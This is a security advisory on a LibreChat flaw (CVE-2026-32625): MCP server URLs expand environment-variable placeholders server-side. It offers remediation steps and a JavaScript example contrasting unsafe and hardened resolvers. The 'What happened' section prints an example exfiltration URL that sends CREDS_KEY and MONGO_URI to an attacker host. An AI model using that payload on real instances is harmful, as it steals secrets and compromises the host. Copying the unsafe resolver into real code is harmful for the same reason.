LibreChat CVE-2026-32625 — MCP URL Env-Var Interpolation Leaks Secrets
AI relevance: LibreChat is a widely deployed multi-provider LLM chat platform and MCP client — when MCP server URL configuration triggers server-side environment-variable interpolation, an authenticated user can harvest all critical secrets from the host process with a single crafted URL.
What happened
- CVE-2026-32625 (CVSS 9.6, CWE-200) — In LibreChat ≤ 0.8.3, the Zod schema validation pipeline for user-supplied MCP server URL fields resolves `${VAR}` placeholders against the server's own `process.env` before connecting.
- An attacker with any authenticated account navigates to the MCP server configuration UI and enters a URL such as `https://attacker.com/?key=${CREDS_KEY}&mongo=${MONGO_URI}`.
- When LibreChat attempts to connect, the placeholders are expanded server-side and the resolved values (e.g., `CREDS_KEY`, `CREDS_IV`, `JWT_SECRET`, `MONGO_URI`) are sent as query parameters to the attacker-controlled host.
- This is distinct from the previously reported CVE-2026-44653 (viewers leaking API keys via API response) — this vector works at the URL interpolation layer and requires no API endpoint abuse.
- Disclosure: June 2, 2026. Patched in LibreChat 0.8.4-rc1.
Why it matters
- CVSS 9.6 makes this a near-critical issue for any self-hosted LibreChat instance that accepts user-contributed MCP server configurations.
- The leaked secrets cover the full cryptographic and persistence stack: encryption keys (`CREDS_KEY`, `CREDS_IV`), JWT signing material, and the MongoDB connection string — effectively total instance compromise.
- This is the second MCP-related credential disclosure in LibreChat within days (following CVE-2026-44653), highlighting that MCP client integrations in multi-user chat platforms have systematic credential-handling gaps.
- The root cause — environment-variable interpolation on user-controlled input — is a pattern that could affect other MCP client implementations that resolve `${ENV}` syntax in configuration fields.
What to do
- Upgrade LibreChat to 0.8.4-rc1 or newer.
- If patching is not immediately possible, restrict MCP server configuration to admin-only roles and disable user-contributed server entries.
- Rotate `CREDS_KEY`, `CREDS_IV`, `JWT_SECRET`, and `MONGO_URI` on any pre-0.8.4 LibreChat instance with a non-trivial user base.
- Review any other MCP client or agent platform that interpolates environment variables in user-facing configuration fields — this class of vulnerability is portable.
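To make the root-cause pattern and the review advice concrete, here is an added illustration (not LibreChat's code): the unconditional `${VAR}` expansion the advisory describes, beside a hardened resolver that refuses placeholders in user-supplied URLs and, for operator-owned config, only honours names under an assumed `MCP_` prefix. The function names, the sample environment and the prefix policy are assumptions chosen for the example.

```javascript
// Added example, not LibreChat's code. Names, SAMPLE_ENV values and the MCP_
// prefix policy are assumptions for illustration.
const PLACEHOLDER = /\$\{([A-Za-z_][A-Za-z0-9_]*)\}/g;

// Constructed stand-in for process.env so the example runs offline.
const SAMPLE_ENV = {
  CREDS_KEY: "constructed-creds-key",
  MONGO_URI: "mongodb://db.internal/librechat",
  MCP_GITHUB_TOKEN: "constructed-mcp-token",
};

// Vulnerable pattern: every ${VAR} is expanded from the server environment,
// regardless of whether the string came from an operator file or a user form.
function interpolateUnsafe(value, env = SAMPLE_ENV) {
  return value.replace(PLACEHOLDER, (_, name) => env[name] ?? "");
}

// Lists placeholder names found in a value; handy when auditing stored MCP
// server entries or request logs for this pattern.
function findPlaceholders(value) {
  return [...value.matchAll(PLACEHOLDER)].map((m) => m[1]);
}

// Hardened resolver: user-supplied URLs may not contain placeholders at all;
// operator config may reference only MCP_-prefixed names (assumed policy), so a
// reference to CREDS_KEY or MONGO_URI never resolves to a secret.
function resolveMcpUrl(value, source, env = SAMPLE_ENV) {
  const names = findPlaceholders(value);
  if (source !== "operator" && names.length > 0) {
    throw new Error("placeholders are not allowed in user-supplied MCP URLs");
  }
  const disallowed = names.filter((n) => !n.startsWith("MCP_"));
  if (disallowed.length > 0) {
    throw new Error(`config may not reference: ${disallowed.join(", ")}`);
  }
  const resolved = value.replace(PLACEHOLDER, (_, name) => env[name] ?? "");
  const url = new URL(resolved); // throws on malformed input
  if (url.protocol !== "https:") {
    throw new Error("MCP server URL must use https");
  }
  return url.href;
}
```

`findPlaceholders` can also be run over existing configuration stores to find entries created before the upgrade.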